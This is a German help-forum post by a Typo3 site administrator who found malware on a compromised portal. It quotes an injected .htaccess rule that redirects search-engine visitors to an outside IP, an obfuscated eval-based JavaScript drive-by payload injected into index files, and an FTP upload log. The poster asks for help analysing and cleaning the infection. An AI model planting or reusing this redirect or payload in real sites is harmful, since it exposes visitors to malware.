Trojaner-Board - Schadcode auf Typo3-Internetportal

Hallo zusammen!

Für einem Internetportal, basierend auf Typo3, das ich betreue hat Google in den Webmaster-Tools vor kurzem eine Malware-Warnung ausgesprochen.

Und siehe da, ich habe folgendes vorgefunden:

die .htaccess wurde um folgende Zeilen ergänzt:

Code:

#2b8c75#

<IfModule mod_rewrite.c>
 

RewriteEngine On
 

RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
 

RewriteRule ^(.*)$ hxxp://212.227.7.91/easydox/count.php [R=301,L]
 

</IfModule>
 
 

#/2b8c75#

Zusätzlich wurde in einigen index.php oder index.html Dateien folgender JS-Code eingefügt:

Code:

<? 

#2b8c75#

echo "<script type=\"text/javascript\" language=\"javascript\" >

sp=\"split\";aq=\"0\"+\"x\";w=window;ff=String;z=\"y\";ff=ff.fromCharCode;try{document[\"\x62od\"+z]++}catch(d21vd12v){v=123;vzs=false;try{document;}catch(wb){vzs=2;}if(!vzs)e=w[\"eval\"];if(1){f=\"17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,6b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,6b,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,64,5e,6d,25,5e,58,69,59,5c,5a,62,25,5b,5c,26,5c,6a,5b,25,67,5f,67,1e,32,4,1,17,6b,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,17,34,17,1e,58,59,6a,66,63,6c,6b,5c,1e,32,4,1,17,6b,25,6a,6b,70,63,5c,25,59,66,69,5b,5c,69,17,34,17,1e,27,1e,32,4,1,17,6b,25,6a,6b,70,63,5c,25,5f,5c,60,5e,5f,6b,17,34,17,1e,28,67,6f,1e,32,4,1,17,6b,25,6a,6b,70,63,5c,25,6e,60,5b,6b,5f,17,34,17,1e,28,67,6f,1e,32,4,1,17,6b,25,6a,6b,70,63,5c,25,63,5c,5d,6b,17,34,17,1e,28,67,6f,1e,32,4,1,17,6b,25,6a,6b,70,63,5c,25,6b,66,67,17,34,17,1e,28,67,6f,1e,32,4,1,4,1,17,60,5d,17,1f,18,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,39,70,40,5b,1f,1e,6b,1e,20,20,17,72,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,1e,33,5b,60,6d,17,60,5b,34,53,1e,6b,53,1e,35,33,26,5b,60,6d,35,1e,20,32,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,39,70,40,5b,1f,1e,6b,1e,20,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,6b,20,32,4,1,17,74,4,1,74,4,1,5d,6c,65,5a,6b,60,66,65,17,4a,5c,6b,3a,66,66,62,60,5c,1f,5a,66,66,62,60,5c,45,58,64,5c,23,5a,66,66,62,60,5c,4d,58,63,6c,5c,23,65,3b,58,70,6a,23,67,58,6b,5f,20,17,72,4,1,17,6d,58,69,17,6b,66,5b,58,70,17,34,17,65,5c,6e,17,3b,58,6b,5c,1f,20,32,4,1,17,6d,58,69,17,5c,6f,67,60,69,5c,17,34,17,65,5c,6e,17,3b,58,6b,5c,1f,20,32,4,1,17,60,5d,17,1f,65,3b,58,70,6a,34,34,65,6c,63,63,17,73,73,17,65,3b,58,70,6a,34,34,27,20,17,65,3b,58,70,6a,34,28,32,4,1,17,5c,6f,67,60,69,5c,25,6a,5c,6b,4b,60,64,5c,1f,6b,66,5b,58,70,25,5e,5c,6b,4b,60,64,5c,1f,20,17,22,17,2a,2d,27,27,27,27,27,21,29,2b,21,65,3b,58,70,6a,20,32,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,17,34,17,5a,66,66,62,60,5c,45,58,64,5c,22,19,34,19,22,5c,6a,5a,58,67,5c,1f,5a,66,66,62,60,5c,4d,58,63,6c,5c,20,4,1,17,22,17,19,32,5c,6f,67,60,69,5c,6a,34,19,17,22,17,5c,6f,67,60,69,5c,25,6b,66,3e,44,4b,4a,6b,69,60,65,5e,1f,20,17,22,17,1f,1f,67,58,6b,5f,20,17,36,17,19,32,17,67,58,6b,5f,34,19,17,22,17,67,58,6b,5f,17,31,17,19,19,20,32,4,1,74,4,1,5d,6c,65,5a,6b,60,66,65,17,3e,5c,6b,3a,66,66,62,60,5c,1f,17,65,58,64,5c,17,20,17,72,4,1,17,6d,58,69,17,6a,6b,58,69,6b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,60,65,5b,5c,6f,46,5d,1f,17,65,58,64,5c,17,22,17,19,34,19,17,20,32,4,1,17,6d,58,69,17,63,5c,65,17,34,17,6a,6b,58,69,6b,17,22,17,65,58,64,5c,25,63,5c,65,5e,6b,5f,17,22,17,28,32,4,1,17,60,5d,17,1f,17,1f,17,18,6a,6b,58,69,6b,17,20,17,1d,1d,4,1,17,1f,17,65,58,64,5c,17,18,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,6a,6c,59,6a,6b,69,60,65,5e,1f,17,27,23,17,65,58,64,5c,25,63,5c,65,5e,6b,5f,17,20,17,20,17,20,4,1,17,72,4,1,17,69,5c,6b,6c,69,65,17,65,6c,63,63,32,4,1,17,74,4,1,17,60,5d,17,1f,17,6a,6b,58,69,6b,17,34,34,17,24,28,17,20,17,69,5c,6b,6c,69,65,17,65,6c,63,63,32,4,1,17,6d,58,69,17,5c,65,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,60,65,5b,5c,6f,46,5d,1f,17,19,32,19,23,17,63,5c,65,17,20,32,4,1,17,60,5d,17,1f,17,5c,65,5b,17,34,34,17,24,28,17,20,17,5c,65,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,63,5c,65,5e,6b,5f,32,4,1,17,69,5c,6b,6c,69,65,17,6c,65,5c,6a,5a,58,67,5c,1f,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,6a,6c,59,6a,6b,69,60,65,5e,1f,17,63,5c,65,23,17,5c,65,5b,17,20,17,20,32,4,1,74,4,1,60,5d,17,1f,65,58,6d,60,5e,58,6b,66,69,25,5a,66,66,62,60,5c,3c,65,58,59,63,5c,5b,20,4,1,72,4,1,60,5d,1f,3e,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,20,34,34,2c,2c,20,72,74,5c,63,6a,5c,72,4a,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,23,17,1e,2c,2c,1e,23,17,1e,28,1e,23,17,1e,26,1e,20,32,4,1,4,1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1\"[sp](\",\");}

w=f;s=[];for(i=2-2;-i+1291!=0;i+=1){j=i;if((0x19==031))if(e)s=s+ff(e(aq+(w[j]))+0xa-01);}za=e;za(s)}</script>"; 

  

#/2b8c75# 

?>f(e)s=s+ff(e(aq+(w[j]))+0xa-01);}za=e;za(s)}</script>";

Das einschleusen wurde anscheinend über FTP gemacht, hier mal ein Auszug eines FTP-Logs:

Code:

Sat Jun  1 12:00:23 2013 1 92.243.20.41 4712 /html/index.html.backup a _ i r ***FTP-BENUTZER2*** ftp 0 * c

Sat Jun  1 12:00:23 2013 1 85.158.181.24 5622 /***Zensiert***//index.html a _ i r ***FTP-BENUTZER1*** ftp 0 * c

Sat Jun  1 12:00:23 2013 1 85.158.181.24 5622 /***Zensiert***//index.html a _ i r ***FTP-BENUTZER1*** ftp 0 * c

Sat Jun  1 12:00:23 2013 1 92.243.20.41 4712 /html/index.html.backup a _ i r ***FTP-BENUTZER2*** ftp 0 * c

Sat Jun  1 12:00:23 2013 1 92.243.20.41 4650 /html///fileadmin/_temp_/index.html a _ i r ***FTP-BENUTZER2*** ftp 0 * c

Sat Jun  1 12:00:23 2013 1 85.158.181.24 5994 /***Zensiert***/adressverwaltung/index.php a _ i r ***FTP-BENUTZER1*** ftp 0 * c

Sat Jun  1 12:00:23 2013 1 92.243.20.41 4650 /html///fileadmin/_temp_/index.html a _ i r ***FTP-BENUTZER2*** ftp 0 * c

Sat Jun  1 12:00:23 2013 1 85.158.181.24 5994 /***Zensiert***/adressverwaltung/index.php a _ i r ***FTP-BENUTZER1*** ftp 0 * c

Sat Jun  1 12:00:24 2013 1 92.243.20.41 6234 /html///***Zensiert***/msd1.23/index.php a _ i r ***FTP-BENUTZER2*** ftp 0 * c

Sat Jun  1 12:00:24 2013 1 85.158.181.24 4731 /***Zensiert***/adressverwaltung/adm_my_files/index.html a _ i r ***FTP-BENUTZER1*** ftp 0 * c

Sat Jun  1 12:00:24 2013 1 92.243.20.41 6234 /html///***Zensiert***/msd1.23/index.php a _ i r ***FTP-BENUTZER2*** ftp 0 * c

Sat Jun  1 12:00:24 2013 1 85.158.181.24 4731 /***Zensiert***/adressverwaltung/adm_my_files/index.html a _ i r ***FTP-BENUTZER1*** ftp 0 * c

Sat Jun  1 12:00:24 2013 1 92.243.20.41 32295 /html///***Zensiert***/msd1.23/main.php a _ i r ***FTP-BENUTZER2*** ftp 0 * c

Sat Jun  1 12:00:24 2013 1 85.158.181.24 23671 /***Zensiert***/adressverwaltung/adm_program/index.php a _ i r ***FTP-BENUTZER1*** ftp 0 * c

Sat Jun  1 12:00:25 2013 1 92.243.20.41 32295 /html///***Zensiert***/msd1.23/main.php a _ i r ***FTP-BENUTZER2*** ftp 0 * c

Sat Jun  1 12:00:25 2013 1 85.158.181.24 23671 /***Zensiert***/adressverwaltung/adm_program/index.php a _ i r ***FTP-BENUTZER1*** ftp 0 * c

Sat Jun  1 12:00:27 2013 1 92.243.20.41 5963 /html///***Zensiert***/msd1.23/inc/footer.php a _ i r ***FTP-BENUTZER2*** ftp 0 * c

Sat Jun  1 12:00:27 2013 1 85.158.181.24 4686 /***Zensiert***/adressverwaltung/adm_program/administration/index.html a _ i r ***FTP-BENUTZER1*** ftp 0 * c

Sat Jun  1 12:00:27 2013 1 92.243.20.41 5963 /html///***Zensiert***/msd1.23/inc/footer.php a _ i r ***FTP-BENUTZER2*** ftp 0 * c

Sat Jun  1 12:00:27 2013 1 85.158.181.24 4686 /***Zensiert***/adressverwaltung/adm_program/administration/index.html a _ i r ***FTP-BENUTZER1*** ftp 0 * c

Sat Jun  1 12:00:27 2013 1 92.243.20.41 6009 /html///***Zensiert***/msd1.23/inc/header.php a _ i r ***FTP-BENUTZER2*** ftp 0 * c

Sat Jun  1 12:00:27 2013 1 85.158.181.24 4686 /***Zensiert***/adressverwaltung/adm_program/libs/index.html a _ i r ***FTP-BENUTZER1*** ftp 0 * c

Sat Jun  1 12:00:27 2013 1 92.243.20.41 6009 /html///***Zensiert***/msd1.23/inc/header.php a _ i r ***FTP-BENUTZER2*** ftp 0 * c

Sat Jun  1 12:00:27 2013 1 85.158.181.24 4686 /***Zensiert***/adressverwaltung/adm_program/libs/index.html a _ i r ***FTP-BENUTZER1*** ftp 0 * c

Sat Jun  1 12:00:28 2013 1 92.243.20.41 8204 /html///typo3_src-4.5.0/index.php a _ i r ***FTP-BENUTZER2*** ftp 0 * c

Sat Jun  1 12:00:28 2013 1 85.158.181.24 4758 /***Zensiert***/adressverwaltung/adm_program/modules/index.html a _ i r ***FTP-BENUTZER1*** ftp 0 * c

Sat Jun  1 12:00:28 2013 1 85.158.181.24 4758 /***Zensiert***/adressverwaltung/adm_program/modules/index.html a _ i r ***FTP-BENUTZER1*** ftp 0 * c

Sat Jun  1 12:00:28 2013 1 92.243.20.41 8204 /html///typo3_src-4.5.0/index.php a _ i r ***FTP-BENUTZER2*** ftp 0 * c

Sat Jun  1 12:00:28 2013 1 85.158.181.24 4686 /***Zensiert***/adressverwaltung/adm_program/system/index.html a _ i r ***FTP-BENUTZER1*** ftp 0 * c

Sat Jun  1 12:00:28 2013 1 92.243.20.41 46333 /html///typo3_src-4.5.0/t3lib/class.t3lib_refindex.php a _ i r ***FTP-BENUTZER2*** ftp 0 * c

Sat Jun  1 12:00:28 2013 1 85.158.181.24 4686 /***Zensiert***/adressverwaltung/adm_program/system/index.html a _ i r ***FTP-BENUTZER1*** ftp 0 * c

Sat Jun  1 12:00:28 2013 1 92.243.20.41 46333 /html///typo3_src-4.5.0/t3lib/class.t3lib_refindex.php a _ i r ***FTP-BENUTZER2*** ftp 0 * c

Sat Jun  1 12:00:29 2013 1 85.158.181.24 9898 /***Zensiert***/adressverwaltung/adm_program/system/login.php a _ i r ***FTP-BENUTZER1*** ftp 0 * c

Sat Jun  1 12:00:29 2013 1 85.158.181.24 9898 /***Zensiert***/adressverwaltung/adm_program/system/login.php a _ i r ***FTP-BENUTZER1*** ftp 0 * c

Sat Jun  1 12:00:29 2013 1 92.243.20.41 317672 /html///typo3_src-4.5.0/t3lib/class.t3lib_tcemain.php a _ i r ***FTP-BENUTZER2*** ftp 0 * c

Sat Jun  1 12:00:29 2013 1 92.243.20.41 317672 /html///typo3_src-4.5.0/t3lib/class.t3lib_tcemain.php a _ i r ***FTP-BENUTZER2*** ftp 0 * c

Sat Jun  1 12:00:31 2013 1 85.158.181.24 6065 /***Zensiert***/adressverwaltung/adm_program/system/overall_footer.php a _ i r ***FTP-BENUTZER1*** ftp 0 * c

Sat Jun  1 12:00:31 2013 1 92.243.20.41 4697 /html///typo3_src-4.5.0/t3lib/index.html a _ i r ***FTP-BENUTZER2*** ftp 0 * c

Sat Jun  1 12:00:31 2013 1 85.158.181.24 6065 /***Zensiert***/adressverwaltung/adm_program/system/overall_footer.php a _ i r ***FTP-BENUTZER1*** ftp 0 * c

Ich hab natürlich sofort alle FTP-Passwörter geändert, und den Schadcode aus der .htaccess Datei und den ganzen anderen betroffenen Dateien entfernt.

Mittlerweile habe ich auch ein Typo3-Update durchgeführt, inklusive aller Erweiterungen.

Für mich stellt sich jetzt die Frage: Wie konnte der FTP-Zugang genutzt werden? Sicherheitslücke im (zugegeben veralteten) Typo3 oder Extensions?

Was hat der Code genau gemacht? Die .htaccess ist klar, aber der andere Code?

Danke schonmal für eure Hilfe,
jojoho